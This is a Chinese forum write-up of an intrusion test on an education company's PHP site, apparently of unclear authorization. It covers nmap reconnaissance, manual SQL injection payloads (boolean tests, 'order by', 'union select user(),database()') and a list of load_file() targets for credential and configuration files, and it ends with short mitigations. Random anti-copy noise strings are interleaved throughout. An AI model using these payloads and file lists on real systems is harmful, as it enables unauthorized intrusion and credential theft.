中国网络渗透测试联盟
标题:
记一次Linux系统PHP注入入侵检测
[打印本页]
作者:
admin
时间:
2013-2-16 22:23
标题:
记一次Linux系统PHP注入入侵检测
题记:
' T5 F i6 L, s0 w
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
2 Q$ V4 E( W# R9 X
第一步:获取需要的信息
9 {& D% K, p8 s* }/ M3 l1 Q& J! [
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
3 M5 B" ?( a- H, c4 A
注:以下为保护特用XXX代替敏感信息
. c1 F+ u8 i1 a- n6 _# ?
顺手先PING了一下他们的域名:
8 y5 z, K7 z: `
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
, V/ F# Y: C/ l% U; j/ F) t
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
6 [: y- S( d, ?# z9 }
顺便了解一下TTL,学好基础知识才能一路顺风:
, a5 P! Y$ c3 J+ y9 y
TTL:(Time To Live ) 生存时间
- ?, o! |4 B K
指定数据包被路由器丢弃之前允许通过的网段数量。
8 X& v, X+ b, i; U$ K
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
+ q( f0 `& |: D9 O% s1 W: W
使用PING时涉及到的 ICMP 报文类型
3 l- z* A& X% z6 }& I- g3 N
一个为ICMP请求回显(ICMP Echo Request)
( D6 ~, y' O: C
一个为ICMP回显应答(ICMP Echo Reply)
6 E/ X+ N. t5 l% i
TTL 字段值可以帮助我们识别操作系统类型。
. [ ~# V; R8 j6 Z
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
( ]1 z- |5 X: X0 q9 l6 k
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
5 y$ P" j) i* n# K% U0 |7 T
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
r( h1 y" E! U6 _1 e1 h
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
* _$ Z8 h, P0 E2 [5 K4 t
当然,返回的TTL值是相同的
- H0 k- u& [* ?3 {; ?2 r5 q
但有些情况下有所特殊
0 C. _2 V" w: w
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
. _3 _! p$ c, T6 {6 r0 A. |3 r/ W2 }
FreeBSD 4.1, 4.0, 3.4;
' o! f5 u* I0 \" ?& Z
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
0 O7 U/ L( q; Y- V
OpenBSD 2.6, 2.7,
9 _6 a% m) J/ E
NetBSD
$ N0 B: d* J" Z% s1 V
HP UX 10.20
, R" R. y) U# E: O# I
ICMP 回显应答的 TTL 字段值为 255
, ~7 L# Y0 c8 ~& w- I' s
Windows 95/98/98SE
F* H% \$ M5 V6 w
Windows ME
: s. D( A. G7 O8 \0 V
ICMP 回显应答的 TTL 字段值为 32
. ^5 e3 f+ [. P2 R7 G5 T
Windows NT4 WRKS
9 }: A$ u' {, x6 z0 U
Windows NT4 Server
) P* [$ e% \! P1 F
Windows 2000
. D+ R6 E' e( Y3 u; c
Windows XP
5 I, n! V+ h3 N4 [ J) \
ICMP 回显应答的 TTL 字段值为 128
$ o/ H6 n# | V9 X1 v* r/ }3 o
这样,我们就可以通过这种方法来辨别操作系统
/ }' ^$ p+ w5 l( r5 c! S5 m
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
, X+ t1 B6 V. H' ~& E
用NMAP扫描一下:
, s( E7 B6 Z# y; j0 E
nmap -sT -O XXX.XXX.XXX.XXX
7 M' z y& x- a+ }9 p0 u' m2 ]
如果没有装WinPcap则会弹出提示:
: v, M5 a8 {$ {3 n+ i$ E
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
1 }3 @- J* ^& L, r/ e, y7 X' t& {1 _8 N
ade to version 3.1 or higher from
http://www.winpcap.org.
Resorting to connect(
$ f2 ~3 Z9 U! u
) mode — Nmap may not function completely
! [5 F' h0 _( O2 |: x+ S7 c
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
/ T2 P# y- v/ i8 c. e% z3 p
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
: Y* g$ c) ?( u& _
pcap is available from
http://www.winpcap.org.
iphlpapi.dll comes with Win98 an
' i' o* C+ ?, r
d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v
! |2 [; E$ l/ @( T4 b0 R. O
ersions, you may be able to take iphlpapi.dll from another system and place it i
1 R. Q$ r: t. [7 |$ A( U% z, L
n your system32 dir (e.g. c:\windows\system32).
/ q2 ?5 [6 P- A' M, ?0 f
QUITTING!
" ?3 d0 ^8 M; ~8 H, }
到这里下载:
http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
+ b( K9 m/ C7 T, s
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
8 s8 A+ k2 U- u* O
Interesting ports on XXX.XXX.XXX.XXX:
& D- K% C2 ]8 V2 d& l- x! V3 l
Not shown: 986 closed ports
# v# M4 E: b" A" z5 h, ^0 ?7 J
PORT STATE SERVICE
3 }' G% Z B8 c7 k2 z9 E
21/tcp open ftp
; j" B+ g8 _$ A0 Q! t
22/tcp open ssh
2 z7 ~: z6 B8 N s0 f6 h* _6 ?' }8 z
23/tcp open telnet
$ o- Y, w5 g2 Y; n5 g* z
80/tcp open http
4 M8 r4 h3 w* q$ s8 I
111/tcp open rpcbind
" A% ~/ e- z* l; @4 ~- Z4 `
135/tcp filtered msrpc
% j$ P" d% s3 t
139/tcp filtered netbios-ssn
( N4 q, L! v5 g
445/tcp filtered microsoft-ds
; w1 N" i& E( s( \+ e
513/tcp open login
- i. e1 h- E& e- t
514/tcp open shell
, B$ r, E1 Y9 C' O8 v }
593/tcp filtered http-rpc-epmap
" X3 z6 H: M- x0 n" {( d- e) Z+ L4 i
1720/tcp filtered H.323/Q.931
% Q) {( z X" f( v* z; a
3306/tcp open mysql
# L# i( t- L/ k6 A2 T! L Q( D
4444/tcp filtered krb524
& K( D, }) J7 E- O+ m$ N0 A( `
Device type: WAP
& r4 s& N8 V5 T! P" f
Running: Linux 2.4.X
C: H- V" P& R( ?
OS details: DD-WRT (Linux 2.4.35s)
1 `# ]3 S2 J: Q2 E9 v
Network Distance: 13 hops
/ g, X% t, N" d% g
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
2 a. q: g- R$ Z+ c& p9 A3 @6 D* A
login as:
9 z7 |0 R, a R- H# D1 _; y
Telnet23端口也是开着的,用telnet 命令链接一下:
* x" q+ b% ?* j3 U5 u/ G: `% N
telnet XXX.XXX.XXX.XXX
7 L0 @6 a l% h7 L8 S: u
提示:
7 I; L$ F" x) c4 |1 T
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
( @4 G" S; u7 ]* ?5 H* W" N
Kernel 2.6.18-92.el5PAE on an i686
& {4 z1 H& |1 Z8 u$ G
login:
, o" T7 R( K5 X7 X8 X
获取HTTP头信息:
* r" X1 Q2 @0 A4 Y" }
在本地执行如下PHP代码
' e" Z1 ~8 m/ }# w2 | z
<?php
- m6 @. M2 v. P! y# [
$url = ‘XXX.XXX.XXX.XXX’;
7 H$ E* `% _& K* @, e4 I! b+ I, {' N
print_r(get_headers($url));
/ W. \; k3 F9 I7 N5 |/ n2 k) Y" ~
print_r(get_headers($url, 1));
4 @5 m: m4 |/ }
?>
/ ~5 k+ U) o6 q- e: i
将以上代码保存为PHP文件,执行:
; d6 |* m" Y) `* A
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
# Y+ Y1 K) F d0 y
现在可以得出结论:
3 x. E ~( F% u% H4 J5 P. H
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
2 s" D2 d# d2 _% H6 O4 }# E8 @( a
内核版本:Kernel 2.6.18-92.el5PAE on an i686
) p- w# r: b W: G8 _. T+ F
WEB服务器版本:nginx/0.7.61
% f! n& E: [ O" K3 h
第二步,开始测试寻找漏洞
3 i3 \2 X2 v1 `) c g: q& [
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
1 ?! C, P! a# U- e& s
1、敏感地址:站内存在有类似:
http://www.fovweb.com/XXX.php?id=123
这种地址,属动态传参的
+ x: u( @! u" K1 X- ^
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
1 d( e4 |6 p) ^, A& Z
http://www.fovweb.com/XXX.php?id=123
and 1=1 返回正常
1 i0 r+ V; ~, v* S. J. A/ u/ F
http://www.fovweb.com/XXX.php?id=123
and 1=2 返回错误
; L5 r& J3 p- \7 `$ E6 Y* M% ]
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
8 o% Z( Y l C" y: n) C
3、手工注入:
+ K7 A' ~6 E; l4 S# G& J
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
/ x2 I7 ^4 B r$ M7 r
3.1 猜测当前表字段数
' C$ [% p' J+ t, t n
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 10
4 ^2 ]# [/ i; {* q
此处猜测有个简单的算法,都是有技巧的吗,呵呵
: I, n/ o A8 a5 C% Z+ b. H
算法简单如下:
8 V/ ~# e$ ]0 \( r- A
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
) Z# t2 l* O: ]7 u4 c' b+ Q
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
, a. }3 Z" I! f9 o# {0 E& t$ U
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
, u" v3 Z. F& g! j: w
以此来判断,是否过界,配合取中算法猜出字段数。
- o3 V- F) `( F( T* ]3 _
举例:
+ l+ n ~. o" M2 E
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 3 返回正常
- a$ q% |1 ~3 b+ y2 O- M, u
http://www.fovweb.com/XXX.php?id=123
and 1=1 order by 4 返回错误
4 P: A( U! z0 t, E
此时3则为我们要找的字段数。
9 W+ d/ p q& J( S7 M
3.2 配合union联合查询字段在页面所位置
9 f/ g8 e2 U9 ?% x0 B) z& V' x5 e
我们已经知道了字段数为3,此时则可以做如下操作:
& \& H1 Y; k+ B0 r! _8 @
http://www.fovweb.com/XXX.php?id=123
and 1=2 union select 1,2,3
3 O( g& j. I- E" Y1 r& X
& }$ E# ]7 _+ z) S1 e1 J4 h0 X6 P/ F
这样就可以测试到哪些字段在页面上有所显示了,如图:
0 l* a' X: E* y ^ k
0 \5 d; V) E/ @7 I, n! y- H: b
3.3 查敏感信息
; C' \/ g- c' B4 F# i, {
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
4 w; D8 r& N6 Y" Y2 g
http://www.fovweb.com/XXX.php?id=123
and 1=2 union select 1,user(),database()
% `1 l: v, q$ a- B3 q- T
3.3.1 先查数据库用户、数据库名,以备后用,如图:
+ J4 N" \% k4 s# @
! G* L8 B0 U/ y! \9 m
得到数据库用户为root、数据库名为DBxx;
- j$ w+ n' ?, Y( n5 O) E) H# F3 E
3.3.2 查配置文件
: g( e' X- t1 r+ g" `
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
8 e- J6 e* q4 x1 n( f3 H
查看文件有一定的条件限制:
. V# G* D6 ?; W1 |; G7 {0 G
欲读取文件必须在服务器上
: V: ~% b0 c* y+ G
必须指定文件完整的路径
# C# @3 |/ G! S' v
必须有权限读取并且文件必须完全可读
+ W6 y' o* L0 |% \: Q" n- g. b6 z' D
欲读取文件必须小于 max_allowed_packet
* y6 S0 R' y' n, K1 C, f
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
& s0 I1 W" A5 [ }: B! q6 o5 D2 |
常用的一些:
8 I$ V+ W6 T M% T$ u$ A+ Q! l% Z
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
" T4 u5 I" t3 h4 Q+ b* G8 M+ `
/usr/local/apache2/conf/httpd.conf
" h* x6 T6 h" l) e
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
6 G4 z$ l v1 H
/usr/local/app/php5/lib/php.ini //PHP相关设置
6 E$ E! g6 J- S# [& m7 L
/etc/sysconfig/iptables //从中得到防火墙规则策略
- s" `( k% t& p J J1 f$ k% j7 d
/etc/httpd/conf/httpd.conf // apache配置文件
: W8 i8 Y. l5 ^: }
/etc/rsyncd.conf //同步程序配置文件
9 }; _% ]* }3 B4 T. _, [( W
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
- ?7 k+ ^ Q0 d0 V6 u" v; V G
/etc/my.cnf //mysql的配置文件
1 A3 y: p& I* P- a+ v$ A
/etc/redhat-release //系统版本
8 J& J+ N* e7 J, @. B+ R% _8 m1 [
/etc/issue
6 Y7 }6 s/ v6 n( M
/etc/issue.net
5 k' J9 u0 X. Q
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/ M! W$ a. X8 p$ g
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
6 Z! G% w1 R) L2 l2 d" x* Y
c:\Program Files\Serv-U\ServUDaemon.ini
: I# c) `8 M, ?5 }, W
c:\windows\my.ini //MYSQL配置文件
5 z$ c) d6 Y, ~3 q3 X$ h
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件
+ D. S/ S1 o: h, E# B
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
. E1 T$ T. L8 M: o* Q
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
7 r% X, y0 ?1 J4 C2 y t
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
# p0 z$ j9 ?3 i' G, v% R
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
" f5 b; F2 g7 ^" w1 `3 J
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
) E5 n" u& H. i9 p) L
//存储了pcAnywhere的登陆密码
2 a+ r% @$ e& X3 v8 ]
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
2 v- g, O$ P4 |
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
9 F- p5 [" f) F* j6 c% M+ B
最后:防范措施
& q3 G5 Q5 z+ R; |
1、修复PHP注入漏洞;
/ k2 R& V. F# `' N; s/ U
2、Mysql使用普通权限的用户;
6 D* y9 X6 Y. Q
3、升级linux内核至最新版本;
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2